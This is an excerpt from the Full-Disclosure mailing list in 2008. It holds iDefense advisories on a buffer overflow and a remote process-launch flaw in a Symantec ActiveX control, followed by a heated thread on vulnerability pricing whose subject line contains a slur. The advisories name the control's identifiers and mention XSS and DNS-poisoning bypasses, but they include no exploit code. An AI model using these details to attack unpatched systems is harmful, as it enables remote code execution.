http://www.sco.com/support/update/download/release.php?rid=324

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0310 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/04/2007  Initial vendor notification
10/30/2007  Initial vendor response
04/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From labs-no-reply at idefense.com  Thu Apr  3 23:55:51 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 03 Apr 2008 18:55:51 -0400
Subject: [Full-disclosure] iDefense Security Advisory 04.02.08: Symantec
 Norton Internet Security 2008 ActiveX Control Buffer Overflow Vulnerability
Message-ID: <47F56077.4000008@idefense.com>

iDefense Security Advisory 04.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 02, 2008

I. BACKGROUND

Norton Internet Security 2008 is a system security suite that offers
protection from spyware, viruses, identity theft, spam, and malicious
network traffic. More information can be found on the vendor's site at
the following URL.

http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=is&pvid=nis2008

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in an ActiveX
control installed by Symantec Norton Internet Security 2008 could allow
for the execution of arbitrary code.

Norton Internet Security 2008 installs the following ActiveX control
which is registered as safe for scripting:

  Clsid: 3451DEDE-631F-421c-8127-FD793AFC6CC8
  File: C:\PROGRA~1\COMMON~1\SYMANT~1\SUPPOR~1\SymAData.dll
  Version 2.7.0.1

This control contains an exploitable stack based buffer overflow.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code with the
privileges of the currently logged in user. In order for exploitation
to occur, an attacker would have to lure a vulnerable user to a
malicious web site.

While this control is marked as safe for scripting, the control has been
designed so that it can only be run from the "symantec.com" domain. In
practice this requirement can be bypassed through the use of any Cross
Site Scripting (XSS) vulnerabilities in the Symantec domain.
Exploitation could also occur through the use of DNS poisoning attacks.

IV. DETECTION

iDefense confirmed that this vulnerability exists in version 2.7.0.1 of
the control that is installed with the 2008 version of Norton Internet
Security. Other versions may also be available.

V. WORKAROUND

Setting the kill-bit for this control will prevent it from being loaded
within Internet Explorer. However, doing so will prevent legitimate use
of the control.

VI. VENDOR RESPONSE

Symantec has addressed this vulnerability by releasing updates. For more
information, refer to their advisory at the following URL.

http://www.symantec.com/avcenter/security/Content/2008.04.02a.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0312 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/05/2007  Initial vendor notification
12/05/2007  Initial vendor response
04/02/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Peter Vreugdenhil.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From labs-no-reply at idefense.com  Fri Apr  4 00:01:57 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 03 Apr 2008 19:01:57 -0400
Subject: [Full-disclosure] iDefense Security Advisory 04.02.08: Symantec
 Internet Security 2008 ActiveDataInfo.LaunchProcess Design Error
 Vulnerability
Message-ID: <47F561E5.5050000@idefense.com>

iDefense Security Advisory 04.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 02, 2008

I. BACKGROUND

Norton Internet Security 2008 is a system security suite that offers
protection from spyware, viruses, identity theft, spam, and malicious
network traffic. More information can be found on the vendor's site at
the following URL.

http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=is&pvid=nis2008

II. DESCRIPTION

Remote exploitation of a design error in an ActiveX control installed
with Symantec Norton Internet Security 2008 could allow for the
execution of arbitrary code.

Norton Internet Security 2008 installs the following ActiveX control
which is registered as safe for scripting:

  Progid: SymAData.ActiveDataInfo.1
  Clsid: 3451DEDE-631F-421c-8127-FD793AFC6CC8
  File: C:\PROGRA~1\COMMON~1\SYMANT~1\SUPPOR~1\SymAData.dll
  Version:  2.7.0.1

This control contains functionality designed to allow Symantec to
remotely execute programs on the target machine.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code with the
privileges of the currently logged in user. In order for exploitation
to occur, an attacker would have to lure a vulnerable user to a
malicious web site.

While this control is marked as safe for scripting, the control has been
designed so that it can only be run from the "symantec.com" domain. In
practice this requirement can be bypassed through the use of any Cross
Site Scripting (XSS) vulnerabilities in the Symantec domain.
Exploitation could also occur through the use of DNS poisoning attacks.

IV. DETECTION

iDefense confirmed that this vulnerability exists in version 2.7.0.1 of
the control that is installed with the 2008 version of Norton Internet
Security. Other versions may also be available.

V. WORKAROUND

Setting the kill-bit for this control will prevent it from being loaded
within Internet Explorer. However, doing so will prevent legitimate use
of the control.

VI. VENDOR RESPONSE

Symantec has addressed this vulnerability by releasing updates. For more
information, refer to their advisory at the following URL.

http://www.symantec.com/avcenter/security/Content/2008.04.02a.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0313 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/14/2007  Initial vendor notification
12/14/2007  Initial vendor response
04/02/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From mlande at bellsouth.net  Fri Apr  4 03:21:17 2008
From: mlande at bellsouth.net (Mary Landesman)
Date: Thu, 3 Apr 2008 22:21:17 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw
	masssecurityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com><4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com><4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com><27886.1207189079@turing-police.cc.vt.edu><fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com><030b01c89543$0b481540$6401a8c0@maryl><C4B44D4D4D0053622A781365@Macintosh.local><82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com><6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com><004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
Message-ID: <033901c895fa$913c9b50$6401a8c0@maryl>

I think the concerns you're raised about profiteering/marketing on the list
are valid. I hadn't thought of it from that perspective, frankly. 

It can be helpful to have a central resource/calendar to be informed about
them. I would subscribe to a specific list for that.

-- Mary

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v
Sent: Thursday, April 03, 2008 5:39 PM
To: Garrett M. Groff; n3td3v; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: Let's outlaw
masssecurityconferencespamming its f****** gay

On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff <groffg at gmgdesign.com>
wrote:
> Regarding the particular person in question, I'll defer to others who 
> know him (or her, or they, or whomever) better than I do. Instead, 
> I'll say that, generally, on lists like FD, there is a minority of 
> out-spoken personalities who sadly support the stereotypical hacker 
> persona: condescending egoists who are socially inept and emotionally 
> charged when discussing topics that relate to their knowledge domain. 
> That's unfortunate, since the broader IT security community is poorly
represented due to attention-seeking zealots.
>
> Regarding the idea of "oulawing security conference spamming," I'd say 
> the literal idea of outlawing cross-posts to multiple security mailing 
> lists is a bad idea. The idea that the legislature should write into 
> law legislation that reduces our freedom in such a sense is a slippery 
> slope borne of emotionalism and narrowness. What else should the 
> government do to curtail our freedoms? I tend to side with libertarian 
> types (though I don't call myself a "libertarian" un-qualified) on 
> what the government should do and what they should not do. And 
> micro-manage security mailing lists is something they should not do. 
> It's a bad idea and would make a dreadful precedent.

Full-Disclosure is ment to be about free source, not making money. I'm
against people who make money come on the mailing lists, its commerical
spam. We can't allow this to continue, here are what I don't like:

- Come to our conference - profit... buy our ticket, get a macbook prize.

- Hacking challenge prize - profit... they give you $5000 and sell it to the
vendor for a lot more.

- Train to use our software -profit... over priced training for software...
not interested.

On the issue of how much a vulnerability is worth, the prices are not
regulated, we need regulation into how much a vulnerability costs, because
the prices right now are wild. We need to take vulnerability pricing off the
blackmarket and onto a legitimate central website for selling
vulnerabilities, or cash rewards for disclosing a vulnerability to a
particular company or organisation. I don't like sites like digital
armaments which when i visited it, the content and answers they gave were
questionable, and people have complained about digital armaments in the
past. Its time to get pricing regulated and defined, so everyone knows whos
being joe jobbed and who isn't.

Can someone post to full-disclosure a price list of what they think a
bufferoverflow should be worth etc, and we can vote if we agree.

So what i'm calling for is someone to post up a hackers price list per
vulnerability type.

XSS/SQL should be worth something as well, so Morning_Wood can buy milk and
a news paper in the mornings after he's taken care of his wood.

Sorry i've ended this e-mail with slightly off-topicness, but I do think
pricing needs to be defined.

We can't dress up cash prizes/contests as something else as well, if a
website is offering a $5,000 reward for a vulnerability, we need to know if
we're being ripped off with the cash reward and how much can be potentially
made after its sold on.

Robert Lemos even http://www.securityfocus.com/news/11510 talked about
vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash reward
might not be enough money, compared to what a vulnerability
*should* be worth, and taking into consideration how much profit CanSecWest
make overall from people attending the conference.

So you take into consideration how much a vulnerability should be worth,
then the added worth because its a security conference of how much should be
added on to counter the profit being made by the event.

A vulnerability should be worth more if its disclosed at a security
conference than if its bought privately, because you've got to take in
profit  and free advertsing to calculate.

However, to round off, we can't allow the mailing lists to turn into a
vulnerability market place, full-disclosure should be for free stuff, and
other websites and mailing lists can be setup for *money making schemes and
auctions*.

We shouldn't allow the money makers directly to market X... if a link is put
on Full-Disclosure by a member of the public on the fly then thats ok, but I
think its cheeky for the particular conference, contest runner or software
trainer to be on the list themselves spamming everyone, for a profiteering
agenda.

You mention cross-posting, thats not the issue here, its the people making
the money posting to make the money that offends me so much.

And not even the lonely hacker offends me who posts i've got a vulnerability
for sale for X, I don't mind that on Full-Disclosure, but what I do mind is
if its a company or organisation doing it that is directly the ones making
the money via vulnerability for sale, prize contest, security conference or
train to use our software!!!, thats the height of spam I just think is
utterly wrong and unethical on any scale of acceptability.

If a lonley hacker who works in a supermarket has a vulnerabilty to sell i'm
all for it being post on full-disclosure, but not the big money conferences,
prize hacking contests and software training guys.

I come under the bracket as supermarket worker with nothing much going for
me in life, so I should be allowed to sell a vulnerability on what's ment to
be a mailing list for non-profit disclosure.

If we tolerate the money making schemes much longer, eventually
full-disclosure will be a wash with conference,training,cash prize spam, etc
once everyone realises the full value of vulnerabilities and the huge
amounts of money to be made from setting up a cash prize contest, the huge
amounts of money to be made from setting up a security conference and the
huge amounts of money to be made from training people to use your hax0r
software.

You will find it easy to shout me down and say n3td3v's an idiot, but wait
to the vulnerability market really takes off and the prices of
vulnerabilities are properly defined and regulated, you're going to see a
huge increase in commercial spam on the mailing lists, like the
full-disclosure mailing list. so we've got to define what's fair play e-mail
and what's a company or organisation blatantly profiteering with X method of
extracting money out of people and using skilled hackers to make money, and
to promote a security conference, training etc.

All the best,

n3td3v

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From groffg at gmgdesign.com  Fri Apr  4 04:22:47 2008
From: groffg at gmgdesign.com (Garrett M. Groff)
Date: Thu, 3 Apr 2008 23:22:47 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
Message-ID: <76AAE5898B50423A94099BC054C8B16A@Komputer01>

netdev, I'll begin by confessing that I merely skimmed your email and did 
not peruse it. Having said that, the buying and selling of vulnerabilities 
is subject to the trading of anything else, be it commidities, products, 
services, securities (such as stocks), or other tradeable assets.

What you proposed is economic in nature and not unique or specific to 
geekdom. Specifically, what you're suggesting is more in line with Marxism, 
where a "fair" price is dictated by a central authority. Instead, our system 
of free-market capitalism is such that vulnerabilities can be bought and 
sold by whomever wishes to buy them and sell them. (Furthermore, evidence 
suggests that black market activity would *increase* in cases where trading 
of a given item is highly restricted on the legitimate market (relegating 
the trading to the black market); for eg, the trading of illicit drugs 
exists and is a multi-billion dollar industry in the US despite laws that 
proscribe the trading and possession of those drugs).

--

Regarding the information on conferences and such that are touted on this 
list (and others), it's something that we'll just have to deal with. This 
list is un-moderated and, perhaps, there are people who appreciate the 
information.

- G


----- Original Message ----- 
From: "n3td3v" <xploitable at gmail.com>
To: "Garrett M. Groff" <groffg at gmgdesign.com>; "n3td3v" 
<n3td3v at googlegroups.com>; <full-disclosure at lists.grok.org.uk>
Sent: Thursday, April 03, 2008 5:38 PM
Subject: Re: [Full-disclosure] Fwd: Let's outlaw mass 
securityconferencespamming its f****** gay


> On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff <groffg at gmgdesign.com> 
> wrote:
>> Regarding the particular person in question, I'll defer to others who 
>> know
>> him (or her, or they, or whomever) better than I do. Instead, I'll say 
>> that,
>> generally, on lists like FD, there is a minority of out-spoken 
>> personalities
>> who sadly support the stereotypical hacker persona: condescending egoists
>> who are socially inept and emotionally charged when discussing topics 
>> that
>> relate to their knowledge domain. That's unfortunate, since the broader 
>> IT
>> security community is poorly represented due to attention-seeking 
>> zealots.
>>
>> Regarding the idea of "oulawing security conference spamming," I'd say 
>> the
>> literal idea of outlawing cross-posts to multiple security mailing lists 
>> is
>> a bad idea. The idea that the legislature should write into law 
>> legislation
>> that reduces our freedom in such a sense is a slippery slope borne of
>> emotionalism and narrowness. What else should the government do to 
>> curtail
>> our freedoms? I tend to side with libertarian types (though I don't call
>> myself a "libertarian" un-qualified) on what the government should do and
>> what they should not do. And micro-manage security mailing lists is
>> something they should not do. It's a bad idea and would make a dreadful
>> precedent.
>
> Full-Disclosure is ment to be about free source, not making money. I'm
> against people who make money come on the mailing lists, its
> commerical spam. We can't allow this to continue, here are what I
> don't like:
>
> - Come to our conference - profit... buy our ticket, get a macbook prize.
>
> - Hacking challenge prize - profit... they give you $5000 and sell it
> to the vendor for a lot more.
>
> - Train to use our software -profit... over priced training for
> software... not interested.
>
> On the issue of how much a vulnerability is worth, the prices are not
> regulated, we need regulation into how much a vulnerability costs,
> because the prices right now are wild. We need to take vulnerability
> pricing off the blackmarket and onto a legitimate central website for
> selling vulnerabilities, or cash rewards for disclosing a
> vulnerability to a particular company or organisation. I don't like
> sites like digital armaments which when i visited it, the content and
> answers they gave were questionable, and people have complained about
> digital armaments in the past. Its time to get pricing regulated and
> defined, so everyone knows whos being joe jobbed and who isn't.
>
> Can someone post to full-disclosure a price list of what they think a
> bufferoverflow should be worth etc, and we can vote if we agree.
>
> So what i'm calling for is someone to post up a hackers price list per
> vulnerability type.
>
> XSS/SQL should be worth something as well, so Morning_Wood can buy
> milk and a news paper in the mornings after he's taken care of his
> wood.
>
> Sorry i've ended this e-mail with slightly off-topicness, but I do
> think pricing needs to be defined.
>
> We can't dress up cash prizes/contests as something else as well, if a
> website is offering a $5,000 reward for a vulnerability, we need to
> know if we're being ripped off with the cash reward and how much can
> be potentially made after its sold on.
>
> Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> reward might not be enough money, compared to what a vulnerability
> *should* be worth, and taking into consideration how much profit
> CanSecWest make overall from people attending the conference.
>
> So you take into consideration how much a vulnerability should be
> worth, then the added worth because its a security conference of how
> much should be added on to counter the profit being made by the event.
>
> A vulnerability should be worth more if its disclosed at a security
> conference than if its bought privately, because you've got to take in
> profit  and free advertsing to calculate.
>
> However, to round off, we can't allow the mailing lists to turn into a
> vulnerability market place, full-disclosure should be for free stuff,
> and other websites and mailing lists can be setup for *money making
> schemes and auctions*.
>
> We shouldn't allow the money makers directly to market X... if a link
> is put on Full-Disclosure by a member of the public on the fly then
> thats ok, but I think its cheeky for the particular conference,
> contest runner or software trainer to be on the list themselves
> spamming everyone, for a profiteering agenda.
>
> You mention cross-posting, thats not the issue here, its the people
> making the money posting to make the money that offends me so much.
>
> And not even the lonely hacker offends me who posts i've got a
> vulnerability for sale for X, I don't mind that on Full-Disclosure,
> but what I do mind is if its a company or organisation doing it that
> is directly the ones making the money via vulnerability for sale,
> prize contest, security conference or train to use our software!!!,
> thats the height of spam I just think is utterly wrong and unethical
> on any scale of acceptability.
>
> If a lonley hacker who works in a supermarket has a vulnerabilty to
> sell i'm all for it being post on full-disclosure, but not the big
> money conferences, prize hacking contests and software training guys.
>
> I come under the bracket as supermarket worker with nothing much going
> for me in life, so I should be allowed to sell a vulnerability on
> what's ment to be a mailing list for non-profit disclosure.
>
> If we tolerate the money making schemes much longer, eventually
> full-disclosure will be a wash with conference,training,cash prize
> spam, etc once everyone realises the full value of vulnerabilities and
> the huge amounts of money to be made from setting up a cash prize
> contest, the huge amounts of money to be made from setting up a
> security conference and the huge amounts of money to be made from
> training people to use your hax0r software.
>
> You will find it easy to shout me down and say n3td3v's an idiot, but
> wait to the vulnerability market really takes off and the prices of
> vulnerabilities are properly defined and regulated, you're going to
> see a huge increase in commercial spam on the mailing lists, like the
> full-disclosure mailing list. so we've got to define what's fair play
> e-mail and what's a company or organisation blatantly profiteering
> with X method of extracting money out of people and using skilled
> hackers to make money, and to promote a security conference, training
> etc.
>
> All the best,
>
> n3td3v
> 



From redhowlingwolves at nc.rr.com  Fri Apr  4 05:36:06 2008
From: redhowlingwolves at nc.rr.com (scott)
Date: Fri, 04 Apr 2008 00:36:06 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw
 mass	securityconferencespamming its f****** gay
In-Reply-To: <76AAE5898B50423A94099BC054C8B16A@Komputer01>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>	<27886.1207189079@turing-police.cc.vt.edu>	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>	<030b01c89543$0b481540$6401a8c0@maryl>	<C4B44D4D4D0053622A781365@Macintosh.local>	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>	<004e01c89593$4cec60f0$336b880a@softpro.corp>	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
	<76AAE5898B50423A94099BC054C8B16A@Komputer01>
Message-ID: <47F5B036.1010101@nc.rr.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

He has no clue what it means to live in a democracy, much less a federation.

Let's let the comedy go on, shall we? Definitely breaks the monotony of
everyday BS.


Garrett M. Groff wrote:
> netdev, I'll begin by confessing that I merely skimmed your email and did 
> not peruse it. Having said that, the buying and selling of vulnerabilities 
> is subject to the trading of anything else, be it commidities, products, 
> services, securities (such as stocks), or other tradeable assets.
> 
> What you proposed is economic in nature and not unique or specific to 
> geekdom. Specifically, what you're suggesting is more in line with Marxism, 
> where a "fair" price is dictated by a central authority. Instead, our system 
> of free-market capitalism is such that vulnerabilities can be bought and 
> sold by whomever wishes to buy them and sell them. (Furthermore, evidence 
> suggests that black market activity would *increase* in cases where trading 
> of a given item is highly restricted on the legitimate market (relegating 
> the trading to the black market); for eg, the trading of illicit drugs 
> exists and is a multi-billion dollar industry in the US despite laws that 
> proscribe the trading and possession of those drugs).
> 
> --
> 
> Regarding the information on conferences and such that are touted on this 
> list (and others), it's something that we'll just have to deal with. This 
> list is un-moderated and, perhaps, there are people who appreciate the 
> information.
> 
> - G
> 
> 
> ----- Original Message ----- 
> From: "n3td3v" <xploitable at gmail.com>
> To: "Garrett M. Groff" <groffg at gmgdesign.com>; "n3td3v" 
> <n3td3v at googlegroups.com>; <full-disclosure at lists.grok.org.uk>
> Sent: Thursday, April 03, 2008 5:38 PM
> Subject: Re: [Full-disclosure] Fwd: Let's outlaw mass 
> securityconferencespamming its f****** gay
> 
> 
>> On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff <groffg at gmgdesign.com> 
>> wrote:
>>> Regarding the particular person in question, I'll defer to others who 
>>> know
>>> him (or her, or they, or whomever) better than I do. Instead, I'll say 
>>> that,
>>> generally, on lists like FD, there is a minority of out-spoken 
>>> personalities
>>> who sadly support the stereotypical hacker persona: condescending egoists
>>> who are socially inept and emotionally charged when discussing topics 
>>> that
>>> relate to their knowledge domain. That's unfortunate, since the broader 
>>> IT
>>> security community is poorly represented due to attention-seeking 
>>> zealots.
>>>
>>> Regarding the idea of "oulawing security conference spamming," I'd say 
>>> the
>>> literal idea of outlawing cross-posts to multiple security mailing lists 
>>> is
>>> a bad idea. The idea that the legislature should write into law 
>>> legislation
>>> that reduces our freedom in such a sense is a slippery slope borne of
>>> emotionalism and narrowness. What else should the government do to 
>>> curtail
>>> our freedoms? I tend to side with libertarian types (though I don't call
>>> myself a "libertarian" un-qualified) on what the government should do and
>>> what they should not do. And micro-manage security mailing lists is
>>> something they should not do. It's a bad idea and would make a dreadful
>>> precedent.
>> Full-Disclosure is ment to be about free source, not making money. I'm
>> against people who make money come on the mailing lists, its
>> commerical spam. We can't allow this to continue, here are what I
>> don't like:
>>
>> - Come to our conference - profit... buy our ticket, get a macbook prize.
>>
>> - Hacking challenge prize - profit... they give you $5000 and sell it
>> to the vendor for a lot more.
>>
>> - Train to use our software -profit... over priced training for
>> software... not interested.
>>
>> On the issue of how much a vulnerability is worth, the prices are not
>> regulated, we need regulation into how much a vulnerability costs,
>> because the prices right now are wild. We need to take vulnerability
>> pricing off the blackmarket and onto a legitimate central website for
>> selling vulnerabilities, or cash rewards for disclosing a
>> vulnerability to a particular company or organisation. I don't like
>> sites like digital armaments which when i visited it, the content and
>> answers they gave were questionable, and people have complained about
>> digital armaments in the past. Its time to get pricing regulated and
>> defined, so everyone knows whos being joe jobbed and who isn't.
>>
>> Can someone post to full-disclosure a price list of what they think a
>> bufferoverflow should be worth etc, and we can vote if we agree.
>>
>> So what i'm calling for is someone to post up a hackers price list per
>> vulnerability type.
>>
>> XSS/SQL should be worth something as well, so Morning_Wood can buy
>> milk and a news paper in the mornings after he's taken care of his
>> wood.
>>
>> Sorry i've ended this e-mail with slightly off-topicness, but I do
>> think pricing needs to be defined.
>>
>> We can't dress up cash prizes/contests as something else as well, if a
>> website is offering a $5,000 reward for a vulnerability, we need to
>> know if we're being ripped off with the cash reward and how much can
>> be potentially made after its sold on.
>>
>> Robert Lemos even http://www.securityfocus.com/news/11510 talked about
>> vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
>> reward might not be enough money, compared to what a vulnerability
>> *should* be worth, and taking into consideration how much profit
>> CanSecWest make overall from people attending the conference.
>>
>> So you take into consideration how much a vulnerability should be
>> worth, then the added worth because its a security conference of how
>> much should be added on to counter the profit being made by the event.
>>
>> A vulnerability should be worth more if its disclosed at a security
>> conference than if its bought privately, because you've got to take in
>> profit  and free advertsing to calculate.
>>
>> However, to round off, we can't allow the mailing lists to turn into a
>> vulnerability market place, full-disclosure should be for free stuff,
>> and other websites and mailing lists can be setup for *money making
>> schemes and auctions*.
>>
>> We shouldn't allow the money makers directly to market X... if a link
>> is put on Full-Disclosure by a member of the public on the fly then
>> thats ok, but I think its cheeky for the particular conference,
>> contest runner or software trainer to be on the list themselves
>> spamming everyone, for a profiteering agenda.
>>
>> You mention cross-posting, thats not the issue here, its the people
>> making the money posting to make the money that offends me so much.
>>
>> And not even the lonely hacker offends me who posts i've got a
>> vulnerability for sale for X, I don't mind that on Full-Disclosure,
>> but what I do mind is if its a company or organisation doing it that
>> is directly the ones making the money via vulnerability for sale,
>> prize contest, security conference or train to use our software!!!,
>> thats the height of spam I just think is utterly wrong and unethical
>> on any scale of acceptability.
>>
>> If a lonley hacker who works in a supermarket has a vulnerabilty to
>> sell i'm all for it being post on full-disclosure, but not the big
>> money conferences, prize hacking contests and software training guys.
>>
>> I come under the bracket as supermarket worker with nothing much going
>> for me in life, so I should be allowed to sell a vulnerability on
>> what's ment to be a mailing list for non-profit disclosure.
>>
>> If we tolerate the money making schemes much longer, eventually
>> full-disclosure will be a wash with conference,training,cash prize
>> spam, etc once everyone realises the full value of vulnerabilities and
>> the huge amounts of money to be made from setting up a cash prize
>> contest, the huge amounts of money to be made from setting up a
>> security conference and the huge amounts of money to be made from
>> training people to use your hax0r software.
>>
>> You will find it easy to shout me down and say n3td3v's an idiot, but
>> wait to the vulnerability market really takes off and the prices of
>> vulnerabilities are properly defined and regulated, you're going to
>> see a huge increase in commercial spam on the mailing lists, like the
>> full-disclosure mailing list. so we've got to define what's fair play
>> e-mail and what's a company or organisation blatantly profiteering
>> with X method of extracting money out of people and using skilled
>> hackers to make money, and to promote a security conference, training
>> etc.
>>
>> All the best,
>>
>> n3td3v
>>
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH9bA1s+9h2X0fCGcRAq+9AJ0dieUgKq4pya6mF/oWclEBqj2z3gCgjYEr
uoq2+8AfO1q+TyFj9Fts6z8=
=3d9e
-----END PGP SIGNATURE-----



From redhowlingwolves at nc.rr.com  Fri Apr  4 05:38:54 2008
From: redhowlingwolves at nc.rr.com (scott)
Date: Fri, 04 Apr 2008 00:38:54 -0400
Subject: [Full-disclosure] Fwd: Let's
 outlaw	masssecurityconferencespamming its f****** gay
In-Reply-To: <033901c895fa$913c9b50$6401a8c0@maryl>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com><4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com><4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com><27886.1207189079@turing-police.cc.vt.edu><fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com><030b01c89543$0b481540$6401a8c0@maryl><C4B44D4D4D0053622A781365@Macintosh.local><82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com><6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com><004e01c89593$4cec60f0$336b880a@softpro.corp>	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
	<033901c895fa$913c9b50$6401a8c0@maryl>
Message-ID: <47F5B0DE.5000702@nc.rr.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

That is what full-disclosure was created for!?

Due to the massive influx of media attention, it has come to this.


Mary Landesman wrote:
> I think the concerns you're raised about profiteering/marketing on the list
> are valid. I hadn't thought of it from that perspective, frankly. 
> 
> It can be helpful to have a central resource/calendar to be informed about
> them. I would subscribe to a specific list for that.
> 
> -- Mary
> 
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
